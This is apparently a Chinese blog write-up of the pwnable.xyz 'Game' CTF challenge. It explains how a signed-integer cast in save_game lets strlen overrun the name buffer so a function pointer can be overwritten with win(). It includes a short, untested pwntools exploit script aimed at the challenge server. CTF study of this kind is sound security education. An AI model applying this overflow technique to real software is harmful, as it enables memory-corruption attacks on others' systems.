Pwnable.xyz Game

0x1，概述。

这道题漏洞主要在于函数save_game函数的有符号整形使edit_name对名字长度误判导致的溢出，仔细观察save_game函数对数字格式的转换再结合堆结构可以直接发现。

0x2，具体解决方案。

先查一波保护：

 具体逻辑分析:

 main()通过菜单选择行为，并回应。

 Play game 通过指针cur+3 实现。

关键就在于save_game()：

之前init_game()函数分配0x20于save[0]，分配0x10字节于*cur[0]存放初始name。

这里又分配0x20内存于save[1]存放第一个分数。

 之后分析play_game()可知我们的分数保存在*cur[1]且类型为word，但在这里18行将其强制转型为有符号int并储存在save[1]。再来看一下堆的情况：

 

由于malloc()函数连续调用，导致cur[0]和save[0]以及save[1]内存块地址连续，当我们分数为-1时，有符号数0xffffff强制转型为qword：

 

edit_game()单纯测量cur(0x6032a0)长度并决定可输入字符数量.

 

 理论我们只能对cur地址进行不超过0x10字节的输入，但只要不存在/x00，strlen()函数就继续计算字符串长度，这就意味着我们可以控制额外8字符。

即可以控制play_game()调用，修改其地址为win()。

shellcode:

from pwn import * 
#Python 3.9.9

sh = remote("svc.pwnable.xyz",30009)

sh.sendafter("Name: ","A" * 0x10)
sh.sendlineafter("> ","1")
sh.sendlineafter("= ","17")
sh.sendlineafter("> ","2")
sh.sendlineafter("> ","3")
sh.send(b'A' * 0x10 + p64(Address_of_win))
sh.sendlineafter("> ","1")
print(sh.recv())

代码未经测试，仅供参考。

0x3，总结。

这题也不难，仔细审计代码和数据结构是关键。

标签：cur,xyz,Pwnable,game,0x10,Game,sh,sendlineafter,save
来源： https://blog.csdn.net/weixin_44195862/article/details/122044121